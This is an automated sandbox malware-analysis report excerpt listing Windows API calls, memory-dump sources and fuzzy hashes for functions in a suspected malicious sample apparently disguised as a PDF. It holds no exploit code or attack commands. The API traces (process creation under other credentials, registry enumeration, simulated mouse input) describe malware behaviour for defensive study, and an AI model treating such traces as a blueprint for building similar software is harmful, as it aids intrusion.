                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B3E0FA
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B3E120
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00B3E123
                                                                          • SysAllocString.OLEAUT32 ref: 00B3E144
                                                                          • SysFreeString.OLEAUT32 ref: 00B3E14D
                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00B3E167
                                                                          • SysAllocString.OLEAUT32(?), ref: 00B3E175
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                          • String ID:
                                                                          • API String ID: 3761583154-0
                                                                          • Opcode ID: d9aa8728fae2443ac7cb7a41424bdf782b22edd1d7cf1278d72c90d9ff6aa0df
                                                                          • Instruction ID: 19f6bb8a822bf4101b040b884e62fc4fe7863ea87f272a3820d4dfeef9bc599f
                                                                          • Opcode Fuzzy Hash: d9aa8728fae2443ac7cb7a41424bdf782b22edd1d7cf1278d72c90d9ff6aa0df
                                                                          • Instruction Fuzzy Hash: 26219035204109AFDB10AFA8DC89CBB77ECEB09760B108166FA24DB2E0DE74DC418B60
                                                                          APIs
                                                                            • Part of subcall function 00AE1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AE1D73
                                                                            • Part of subcall function 00AE1D35: GetStockObject.GDI32(00000011), ref: 00AE1D87
                                                                            • Part of subcall function 00AE1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AE1D91
                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B678A1
                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B678AE
                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B678B9
                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B678C8
                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B678D4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                          • String ID: Msctls_Progress32
                                                                          • API String ID: 1025951953-3636473452
                                                                          • Opcode ID: 7afe3f1ecaa59b4b3378973c5ffbdf81a4eb4fe7c28378ad1164c50f17378949
                                                                          • Instruction ID: 7e204f2b22a0bbb50bc67781ea972f5704a2e08e3b445fb7c0223fdba9f2b3c9
                                                                          • Opcode Fuzzy Hash: 7afe3f1ecaa59b4b3378973c5ffbdf81a4eb4fe7c28378ad1164c50f17378949
                                                                          • Instruction Fuzzy Hash: 91118EB2150219BEEF159E61CC85EE77F6DEF08758F014115BA04A30A0CB769C21DBA0
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00B04292,?), ref: 00B041E3
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00B041EA
                                                                          • EncodePointer.KERNEL32(00000000), ref: 00B041F6
                                                                          • DecodePointer.KERNEL32(00000001,00B04292,?), ref: 00B04213
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                          • String ID: RoInitialize$combase.dll
                                                                          • API String ID: 3489934621-340411864
                                                                          • Opcode ID: 9c68b969f6f9729ed1d0c3107c067d8967177f8a964e578233f578d5431f30d4
                                                                          • Instruction ID: 1a6da2d791bce1f967b2763745e116102a2c3a8ec9364cf0389ecd958d5f6d07
                                                                          • Opcode Fuzzy Hash: 9c68b969f6f9729ed1d0c3107c067d8967177f8a964e578233f578d5431f30d4
                                                                          • Instruction Fuzzy Hash: 54E0E5B0690301AEEB205BB0EC0AB243EE5FBA2B02F108474F521E71E0DFF944919E04
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00B041B8), ref: 00B042B8
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00B042BF
                                                                          • EncodePointer.KERNEL32(00000000), ref: 00B042CA
                                                                          • DecodePointer.KERNEL32(00B041B8), ref: 00B042E5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                          • String ID: RoUninitialize$combase.dll
                                                                          • API String ID: 3489934621-2819208100
                                                                          • Opcode ID: 750fe8156e4105e9373b971e6f7c4a9f5111643f6fe2795e40a71ce6bb1ca5c9
                                                                          • Instruction ID: e9157eb584c491adcac3a3d7083f439ecaff3469c6b83407ebe5474f7d298f2e
                                                                          • Opcode Fuzzy Hash: 750fe8156e4105e9373b971e6f7c4a9f5111643f6fe2795e40a71ce6bb1ca5c9
                                                                          • Instruction Fuzzy Hash: 2DE092B8691202AFEA109B60FE0AB243EA4BB65B42F204064F111F31E0CFF845448A18
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$__itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 3253778849-0
                                                                          • Opcode ID: 03b96fe320414c51c1165a25205fb8119775fc53f4435a157207cad85c62af19
                                                                          • Instruction ID: 285c55adc2f3a765545ee618557bed7944abdec63eccf0af16359ee8ed277110
                                                                          • Opcode Fuzzy Hash: 03b96fe320414c51c1165a25205fb8119775fc53f4435a157207cad85c62af19
                                                                          • Instruction Fuzzy Hash: 2A61CE3050069A9BCF15EF25CD81EFE3BE4EF49308F044599F8955B292EB309E45DB51
                                                                          APIs
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                            • Part of subcall function 00B610A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B60038,?,?), ref: 00B610BC
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B60548
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B60588
                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00B605AB
                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B605D4
                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B60617
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00B60624
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                          • String ID:
                                                                          • API String ID: 4046560759-0
                                                                          • Opcode ID: f21804be4d722cc7c369450b1fcd86e465a8ac0371d7e322e09a0876071fa429
                                                                          • Instruction ID: 6e3e6a62db0e9ae5eee215fa94dd02a8968a566e6d14d43324c515be65cec5c5
                                                                          • Opcode Fuzzy Hash: f21804be4d722cc7c369450b1fcd86e465a8ac0371d7e322e09a0876071fa429
                                                                          • Instruction Fuzzy Hash: 33516631218240AFCB14EF65D985E6FBBE8FF88314F04496DF586872A2DB75E904CB52
                                                                          APIs
                                                                          • GetMenu.USER32(?), ref: 00B65A82
                                                                          • GetMenuItemCount.USER32(00000000), ref: 00B65AB9
                                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B65AE1
                                                                          • GetMenuItemID.USER32(?,?), ref: 00B65B50
                                                                          • GetSubMenu.USER32(?,?), ref: 00B65B5E
                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00B65BAF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$CountMessagePostString
                                                                          • String ID:
                                                                          • API String ID: 650687236-0
                                                                          • Opcode ID: 8c5bb79a8ae2605afd6218bae84e3b8157c261e2c46cc79870ddb9ba7d403acf
                                                                          • Instruction ID: fc03bad50c058f8cc4182cf59a3844c900b44655462dfb9eb2bcae35fb003c29
                                                                          • Opcode Fuzzy Hash: 8c5bb79a8ae2605afd6218bae84e3b8157c261e2c46cc79870ddb9ba7d403acf
                                                                          • Instruction Fuzzy Hash: C4519135A00615EFCF21DFA4C945AAEB7F4EF48310F1444A9E941B7391CB74AE41CB90
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 00B3F3F7
                                                                          • VariantClear.OLEAUT32(00000013), ref: 00B3F469
                                                                          • VariantClear.OLEAUT32(00000000), ref: 00B3F4C4
                                                                          • _memmove.LIBCMT ref: 00B3F4EE
                                                                          • VariantClear.OLEAUT32(?), ref: 00B3F53B
                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B3F569
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                                                          • String ID:
                                                                          • API String ID: 1101466143-0
                                                                          • Opcode ID: a438e34ba837db4dca4a1c0f33b8a945e42f0657fbbdf8a3bb63fee693392ada
                                                                          • Instruction ID: f3c205479d91911df4c8badd95a2d99bd9b227bdda25895f29b0a03cf083dc21
                                                                          • Opcode Fuzzy Hash: a438e34ba837db4dca4a1c0f33b8a945e42f0657fbbdf8a3bb63fee693392ada
                                                                          • Instruction Fuzzy Hash: 90514BB5A0020AAFCB14CF58D884AAAB7F8FF4C354F15856AE959DB350D734E911CFA0
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B42747
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B42792
                                                                          • IsMenu.USER32(00000000), ref: 00B427B2
                                                                          • CreatePopupMenu.USER32 ref: 00B427E6
                                                                          • GetMenuItemCount.USER32(000000FF), ref: 00B42844
                                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00B42875
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                          • String ID:
                                                                          • API String ID: 3311875123-0
                                                                          • Opcode ID: 7ee15d0348069d777c49b0939e42490630c103cf007a2728f1f6ef7a0fb8d2e4
                                                                          • Instruction ID: 882715d3c3e3e53f0acc34ccc034f3c221bd32f0302822f17baf0cfb82c06da8
                                                                          • Opcode Fuzzy Hash: 7ee15d0348069d777c49b0939e42490630c103cf007a2728f1f6ef7a0fb8d2e4
                                                                          • Instruction Fuzzy Hash: D8519E70A0020AEBDF25CF68D988BAEBBF5EF54314F5041A9F8119B291D7709E44EB61
                                                                          APIs
                                                                            • Part of subcall function 00AE2612: GetWindowLongW.USER32(?,000000EB), ref: 00AE2623
                                                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 00AE179A
                                                                          • GetWindowRect.USER32(?,?), ref: 00AE17FE
                                                                          • ScreenToClient.USER32(?,?), ref: 00AE181B
                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00AE182C
                                                                          • EndPaint.USER32(?,?), ref: 00AE1876
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                          • String ID:
                                                                          • API String ID: 1827037458-0
                                                                          • Opcode ID: 24fb301384d6e68b46fbb3d6180ee8d882baa058602df1dccdcb5924acc55618
                                                                          • Instruction ID: 64a924fbf4e588c4542c9bcb1d584332e989a2c70378e4ccd72548839d55c048
                                                                          • Opcode Fuzzy Hash: 24fb301384d6e68b46fbb3d6180ee8d882baa058602df1dccdcb5924acc55618
                                                                          • Instruction Fuzzy Hash: 8341DB70100351AFC710DF26DC84FBA3BF8EB4A724F140669FAA5872A1CB749845CB61
                                                                          APIs
                                                                          • ShowWindow.USER32(00BA67B0,00000000,01070FB8,?,?,00BA67B0,?,00B6B862,?,?), ref: 00B6B9CC
                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00B6B9F0
                                                                          • ShowWindow.USER32(00BA67B0,00000000,01070FB8,?,?,00BA67B0,?,00B6B862,?,?), ref: 00B6BA50
                                                                          • ShowWindow.USER32(00000000,00000004,?,00B6B862,?,?), ref: 00B6BA62
                                                                          • EnableWindow.USER32(00000000,00000001), ref: 00B6BA86
                                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00B6BAA9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                          • String ID:
                                                                          • API String ID: 642888154-0
                                                                          • Opcode ID: ccaa7da5f9effefe6e12499ef81fc0fe571c576db0ad77fd250175f3190532e3
                                                                          • Instruction ID: 22caddb13f6d3cd72fc70163555421da4763a498afc8cf6e1d4076af9222395d
                                                                          • Opcode Fuzzy Hash: ccaa7da5f9effefe6e12499ef81fc0fe571c576db0ad77fd250175f3190532e3
                                                                          • Instruction Fuzzy Hash: DC415030600241AFDB25CF94D489FA57BF1FB05314F1842F9EA48CF2A2CB79A885CB51
                                                                          APIs
                                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,00B55134,?,?,00000000,00000001), ref: 00B573BF
                                                                            • Part of subcall function 00B53C94: GetWindowRect.USER32(?,?), ref: 00B53CA7
                                                                          • GetDesktopWindow.USER32 ref: 00B573E9
                                                                          • GetWindowRect.USER32(00000000), ref: 00B573F0
                                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00B57422
                                                                            • Part of subcall function 00B454E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B4555E
                                                                          • GetCursorPos.USER32(?), ref: 00B5744E
                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B574AC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                          • String ID:
                                                                          • API String ID: 4137160315-0
                                                                          • Opcode ID: 2de930f1899900409145e9d349b007f17d9fdd1995e25f98f36fc1b0e5930ff6
                                                                          • Instruction ID: cf0f587d83e2e92f907f71d90b6899918a3b4bd105741faf2f0dac99a299648c
                                                                          • Opcode Fuzzy Hash: 2de930f1899900409145e9d349b007f17d9fdd1995e25f98f36fc1b0e5930ff6
                                                                          • Instruction Fuzzy Hash: 6131E872508306ABD720DF14E849F6BBBD9FF88314F000959F98597291CB74EE48CB92
                                                                          APIs
                                                                            • Part of subcall function 00B385F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B38608
                                                                            • Part of subcall function 00B385F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B38612
                                                                            • Part of subcall function 00B385F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B38621
                                                                            • Part of subcall function 00B385F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B38628
                                                                            • Part of subcall function 00B385F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B3863E
                                                                          • GetLengthSid.ADVAPI32(?,00000000,00B38977), ref: 00B38DAC
                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B38DB8
                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00B38DBF
                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00B38DD8
                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00B38977), ref: 00B38DEC
                                                                          • HeapFree.KERNEL32(00000000), ref: 00B38DF3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                          • String ID:
                                                                          • API String ID: 3008561057-0
                                                                          • Opcode ID: f13972605876618edad8aad581e49a25c2ff01aa21d6218b44543f632ebb70c2
                                                                          • Instruction ID: 2e370f00a01e7dda8f42715f7c3f994c77f2b09aa12f36609be664ac013593e9
                                                                          • Opcode Fuzzy Hash: f13972605876618edad8aad581e49a25c2ff01aa21d6218b44543f632ebb70c2
                                                                          • Instruction Fuzzy Hash: 2F11AC32500606FFDB109FA8DC09BBE7BA9FF55355F2040ADF945A7290CB76AA04CB61
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B38B2A
                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00B38B31
                                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B38B40
                                                                          • CloseHandle.KERNEL32(00000004), ref: 00B38B4B
                                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B38B7A
                                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00B38B8E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                          • String ID:
                                                                          • API String ID: 1413079979-0
                                                                          • Opcode ID: 811197733cc0efffba45abfb7661ff25e2d46d6eddda0535e35fbb9e930649df
                                                                          • Instruction ID: f75f0b12745f326d382d939200e1fa3d9b218a3e24d4e89d97e14a483baf823d
                                                                          • Opcode Fuzzy Hash: 811197733cc0efffba45abfb7661ff25e2d46d6eddda0535e35fbb9e930649df
                                                                          • Instruction Fuzzy Hash: 4D112EB250124AEBDF018F94ED49FEA7BE9EF08304F144065FE04A21A0DB769D609B61
                                                                          APIs
                                                                            • Part of subcall function 00AE12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AE134D
                                                                            • Part of subcall function 00AE12F3: SelectObject.GDI32(?,00000000), ref: 00AE135C
                                                                            • Part of subcall function 00AE12F3: BeginPath.GDI32(?), ref: 00AE1373
                                                                            • Part of subcall function 00AE12F3: SelectObject.GDI32(?,00000000), ref: 00AE139C
                                                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00B6C1C4
                                                                          • LineTo.GDI32(00000000,00000003,?), ref: 00B6C1D8
                                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B6C1E6
                                                                          • LineTo.GDI32(00000000,00000000,?), ref: 00B6C1F6
                                                                          • EndPath.GDI32(00000000), ref: 00B6C206
                                                                          • StrokePath.GDI32(00000000), ref: 00B6C216
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
